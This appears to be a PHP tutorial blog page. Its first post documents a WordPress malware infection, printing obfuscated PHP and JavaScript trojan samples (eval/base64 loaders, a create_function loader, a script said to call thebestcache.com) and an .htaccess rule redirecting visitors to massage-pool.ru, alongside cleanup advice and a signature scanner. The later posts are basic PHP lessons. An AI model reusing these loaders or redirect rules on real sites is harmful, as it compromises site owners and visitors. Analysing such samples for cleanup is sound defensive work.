[Solve] WordPress Malware Script Attack Fix

Our server was hacked and all PHP files were infected. Each infected PHP file had malicious code / malware injected into it (see below); the injected code calls another PHP file and runs its program. To clean the files I needed to remove the malware or malicious code from each file, which is really frustrating when you have hundreds of infected files, so what I did is create a script that does it automatically.

List of malicious code / malware scripts that I have encountered so far:

A. c99madshell – this type of malware script gives the attacker the ability to view your database and access your files, just like an admin. Below is the sample code:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

B. Trojan

<?php
...
eval(base64_decode("..."));
...

C. Trojan

<?php
if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}

D. JavaScript Trojan

<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length

E. htaccess – The code below redirects your visitors to the hacker's site (massage-pool.ru)

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php

F. Timthumb Vulnerability

This script is basically used to crop and resize images and is included in most WP premium themes, but hackers found a vulnerability in it that lets them do whatever they want: with the help of this script they can access your database to get important information, insert malicious code into all of your PHP files, create other malicious PHP scripts, and do a lot more.

Any timthumb.php or thumb.php file below version 1.35 is vulnerable; I advise updating the file to version 2.0 or later.

Solution: update your file from here: http://timthumb.googlecode.com/svn/trunk/timthumb.php

G. class-wheel.php

As far as I could decode the file, the script sends important information about your server to thebestcache.com, then gets data back from that server and executes it. I think that with this script the hacker can do whatever they want to your server, just like with timthumb, such as writing RewriteRules into your .htaccess to redirect users to the hacker's site, inserting malicious iframes, inserting malicious JavaScript, and a lot more.

Solution: Delete this file immediately

Below is a snippet of the script:

<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...

H. god_mode_on

<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?>
<?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>

I. Trojan

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

Most of these attacks happen when you run old versions of your programs (WordPress, Joomla, TimThumb, WP plugins), use weak FTP or SFTP passwords, or have an infected computer whose saved FTP credentials get used as well. Make sure you have updated versions of your programs.

Download and Install
Download the cleaner script below and put it in your root directory or any directory. This program will check all the PHP files and clean them if they are infected with the malware code shown above.
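As an added illustration of what a cleaner like this does (my own code, not the page's cleaner_2.10; the regexes are my reading of samples A, B and H above), a Python scanner that finds those fragments in PHP source and cuts them out:

```python
import re

# Signatures built from samples A, B and H in this post (constructed regexes,
# not the page's cleaner). Each whole match is the injected fragment to cut.
SIGNATURES = {
    # H: <?php /*god_mode_on*/ eval(base64_decode("...")); /*god_mode_off*/ ?>
    "god_mode": re.compile(
        r"<\?php\s*/\*god_mode_on\*/.*?/\*god_mode_off\*/\s*\?>", re.S),
    # H: <?php /*<32 hex>_on*/ ... /*<32 hex>_off*/ ?>
    "hash_block": re.compile(
        r"<\?php\s*/\*[0-9a-f]{32}_on\*/.*?/\*[0-9a-f]{32}_off\*/\s*\?>", re.S),
    # B: eval(base64_decode("<literal base64>"));
    "eval_base64": re.compile(
        r"@?eval\s*\(\s*base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]+['\"]\s*\)\s*\)\s*;"),
    # A: a char array, create_function() assembled from its elements, then the
    # call feeding it the payload (matches only when the three statements are adjacent)
    "salt_create_function": re.compile(
        r"\$\w+\s*=\s*array\(.*?\);\s*\$\w+\s*=\s*create_function\(.*?\);\s*"
        r"\$\w+\s*\(\s*'[^']*'\s*\);", re.S),
}

def find_infections(php_source):
    """[(label, start, end)] in file order; hits nested in an earlier hit are dropped."""
    hits = sorted(((label, m.start(), m.end()) for label, rx in SIGNATURES.items()
                   for m in rx.finditer(php_source)), key=lambda h: (h[1], -h[2]))
    kept = []
    for hit in hits:
        if not kept or hit[1] >= kept[-1][2]:
            kept.append(hit)
    return kept

def clean(php_source):
    """Cut every matched fragment; return (cleaned_text, labels_removed)."""
    removed = []
    for label, rx in SIGNATURES.items():
        php_source, count = rx.subn("", php_source)
        removed.extend([label] * count)
    return php_source.strip() + "\n", removed

if __name__ == "__main__":
    import pathlib, sys
    # Usage: python scan_php.py /path/to/site  (report only; call clean() to fix)
    root = pathlib.Path(sys.argv[1] if len(sys.argv) > 1 else ".")
    for path in root.rglob("*.php"):
        for label, start, _ in find_infections(path.read_text(errors="replace")):
            print(f"{path}: {label} at offset {start}")
```

The salt_create_function signature needs the three statements to sit next to each other as in sample A; sample I, whose strings are built from hex and octal escapes, is not covered.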

Malware code keeps coming back
If you removed the malware code / malicious script successfully but it still keeps coming back, I suggest you run the malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and send the scan result to info@php-beginners.com; we need to find the file that causes the malware code / malicious script to come back.

You can download two types of cleaner script
A web browser version and a shell access version. You can use either of the two.

  • Download Cleaner 2.10 HTTP version below and run it in your favorite browser.
    Example: http://www.yoursite.com/cleaner_2.10.php
    Filename: cleaner_2-10.zip (Size: 2 KB)

  • Download Cleaner CLI 2.10 version below and run it from the terminal or command line.
    Example: $ time php cleaner-cli_2.10.php >> cleaner_log 2>&1
    The command above runs the cleaner-cli_2.10.php script and appends its output, errors included, to the cleaner_log file (the order of the two redirections matters: 2>&1 >> cleaner_log would send the errors to the terminal instead of the log).
    Filename: cleaner-cli_2-10.zip (Size: 2 KB)

Note:
Please don't forget to create a backup of your WordPress files, or of the /wp-content/ directory only. Use shell access to back up the files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_file.tar.gz] [directory]

[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./

This malware / malicious code cleaner script works on all PHP programs; you can run it even on non-WordPress sites, but please create a backup of your files before you run the cleaner script, to make sure you can recover them easily.

If you encounter any malware / malicious program that I don't know about, please let me know so that I can add it to the program. Thanks.

Posted in Uncategorized | 330 Comments

[Solved] Local PHP Date/Time is not working properly

I had a little problem running the date("F j, Y, g:i a") function: it worked fine the first time, but then I noticed that it displays a different time from my computer.

<?php
	echo date("F j, Y, g:i a");
?>

OUTPUT:

June 10, 2011, 9:35 am

The correct output is June 10, 2011 5:30 pm, but instead it's 7 hours behind.
Time and date are important in my program because I want to record the date and time when users log in.

There are lots of ways to solve this kind of problem, but I'm going to show only 2 solutions: modifying .htaccess or modifying php.ini. Since I'm from the Philippines, I'll be using the "Asia/Manila" timezone.

1. Using .htaccess:

php_value date.timezone "Asia/Manila"

2. Modifying php.ini

date.timezone = "Asia/Manila"

My timezone references are:
http://24timezones.com/
http://en.wikipedia.org/wiki/Time_zone

Posted in Uncategorized | 3 Comments

Stop Email Notification of WordPress Member Registration

Download, install, and activate the plugin.

Hope it helps. Thanks.

Stop Email Registration Notification
Filename: stop-email-registration-notification.zip (Size: 1 KB)

Posted in Wordpress, WP Plugins | 2 Comments

What is a Database?

A database is used to store information like your customers' details: first name, last name, email address, postal address, etc. A database is very useful on a dynamic website (a type of website that needs frequent changes of content, like news, e-commerce, blogs, etc.), because you can easily retrieve, save, update, and delete data.

A database is composed of tables. A table is composed of rows of data, just like what you see in your Excel file. (See image below)




The text in blue at the top of each column is called the "field name"; in Excel it is called the column title. Field names are very important because they serve as the labels of your data; you cannot create a table without field names.

Sample Situation

Suppose we want to store basic information about our client:

  • First Name
  • Last Name
  • Middle Name
  • Email Address

The first thing we need to do is create a database named "user" and a table named "user" with the field names first_name, middle_name, last_name, and email. Our database structure would be the same as the image below.




As you can see in the image above, our database consists of 1 table that has field names and data in it.

I'll teach you how to create a database and table in my next topic.

Posted in PHP Beginners Course, PHP Tutorial | 1 Comment

PHP Variables

Variables in any programming language are used to hold/store data such as a String, a Number (int, float, double), an Array, or an Object.

$test_variable_name = "Paolo";
$counter = 10;

A PHP variable is like an ice cream cone (see image below): the cone itself is the variable while the ice cream is the data. The data can be a String, a Number, an Array, or an Object.

PHP Variable Scope

This refers to where a variable is accessible in the script.

  • Global Variables – These variables are declared outside any function and can be accessed anywhere outside a function.
  • Local Variables – These variables are declared inside a function and can only be accessed inside that function.

The diagram below shows the variable scope:

Declaring a Variable

We use the equal sign (=) to assign a value to a variable.

$x = "value"; // String data-type. Variable $x now holds the string "value".
$x = 'value'; // String data-type. Single quotes also produce the string "value".

$x = "100";   // String data-type. A numeric string; PHP converts it to the number 100 when used in arithmetic.
$x = '100';   // String data-type. Same as above.
$x = 100;     // Integer (numeric) data-type. Variable $x now holds the number 100.

$x = array(0 => 'value1', "1" => 'value2'); // Array data-type.
$x = array("a" => array("k" => "v"));        // multi-dimensional Array.

$x = false; // boolean
$x = true;  // boolean

$x = new ObjectName(); // Object (ObjectName must be a class you have defined)

How to Declare a PHP Variable

  • A PHP variable must start with a dollar sign ($).
    • $varname
  • The first character of a PHP variable name (after the $) must be an underscore or a letter.
    • $testname
    • $_test
  • A PHP variable name may only contain alphanumeric characters and underscores: a-z, A-Z, 0-9, and _.
  • Invalid PHP variable names are:
    • $8thvar // starts with a number
    • $a#rr // contains the invalid character #

Sample Programs

1) This sample program assigns variables values of the String, Integer, and Float data-types.

<?php
$str = "Hello World!";
$int_sample = 4;
$float_sample = 8.25;

echo $str . "<br/>";
echo $int_sample . "<br/>";
echo $float_sample . "<br/>";
echo "int_sample + float_sample = " . ($int_sample + $float_sample);
?>

OUTPUT:

Hello World!
4
8.25
12.25

2) Sample program for global variable usage.

<?php
$name = "Nino Paolo Amarillento"; // global variable

function myFunc(){
    $name = "Louellyn Bacalla"; // local to myFunc; does not touch the global $name
}

echo $name; // prints the global value
?>

OUTPUT:

Nino Paolo Amarillento

3) Sample program for local variable usage.

<?php
$name = "Nino Paolo Amarillento"; // global variable, not visible inside myFunc

function myFunc(){
    $name = "Louellyn Bacalla"; // local variable
    echo $name;                 // prints the local value
}

myFunc();
?>

OUTPUT:

Louellyn Bacalla

Posted in PHP Beginners Course, PHP Tutorial | 1 Comment